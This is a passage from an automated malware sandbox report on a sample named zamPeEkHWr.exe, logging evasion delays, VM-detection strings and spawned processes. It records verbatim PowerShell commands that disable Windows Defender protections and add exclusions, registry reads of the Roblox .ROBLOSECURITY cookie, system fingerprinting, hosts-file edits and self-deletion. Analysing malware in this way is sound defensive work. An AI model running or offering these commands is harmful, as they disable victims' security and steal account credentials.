                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 591969Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 591844Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 591735Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 591610Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 591485Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeWindow / User API: threadDelayed 5410Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeWindow / User API: threadDelayed 4425Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5181Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4695Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3148Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5066Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1151Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4683Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2908Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4163
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 361
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -597094s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -596969s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -596860s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -596735s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -596610s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -596485s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -596360s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -596235s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -596075s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -595853s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -595750s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -595641s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -595531s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -595422s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -595313s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -595188s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -595063s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -594938s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -594828s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -594716s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -594609s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -594499s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -594388s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -594281s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -594172s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -594063s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -593938s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -593813s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -593688s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -593563s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -593453s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -593342s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -593234s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -593125s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -593008s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -592900s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -592793s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -592688s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -592563s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -592438s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -592313s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -592187s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -592078s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -591969s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -591844s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -591735s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -591610s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432Thread sleep time: -591485s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep count: 5181 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep count: 4695 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep count: 3148 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972Thread sleep count: 230 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080Thread sleep count: 5066 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8084Thread sleep count: 1151 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544Thread sleep count: 4683 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep count: 2908 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep count: 4163 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep count: 361 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7980Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 597094Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 596969Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 596860Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 596735Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 596610Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 596485Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 596360Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 596235Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 596075Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 595853Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 595750Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 595641Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 595531Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 595422Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 595313Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 595188Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 595063Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 594938Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 594828Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 594716Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 594609Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 594499Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 594388Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 594281Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 594172Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 594063Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593938Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593813Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593688Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593563Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593453Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593342Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593234Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593125Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593008Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592900Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592793Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592688Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592563Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592438Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592313Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592187Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592078Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 591969Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 591844Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 591735Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 591610Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 591485Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: zamPeEkHWr.exe, kaS9T.scr.0.drBinary or memory string: vboxtray
                        Source: kaS9T.scr.0.drBinary or memory string: vboxservice
                        Source: zamPeEkHWr.exe, kaS9T.scr.0.drBinary or memory string: qemu-ga
                        Source: kaS9T.scr.0.drBinary or memory string: vmwareuser
                        Source: zamPeEkHWr.exe, kaS9T.scr.0.drBinary or memory string: vmusrvc
                        Source: kaS9T.scr.0.drBinary or memory string: vmwareservice+discordtokenprotector
                        Source: kaS9T.scr.0.drBinary or memory string: vmsrvc
                        Source: kaS9T.scr.0.drBinary or memory string: vmtoolsd
                        Source: kaS9T.scr.0.drBinary or memory string: vmwaretray
                        Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB0357000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareservice
                        Source: zamPeEkHWr.exe, 00000000.00000002.2329889878.000001EAAE884000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe'
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe'Jump to behavior
                        Modifies Windows Defender protection settings
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Modifies the hosts file
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\zamPeEkHWr.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get CaptionJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemoryJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get nameJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\zamPeEkHWr.exe" && pauseJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeQueries volume information: C:\Users\user\Desktop\zamPeEkHWr.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
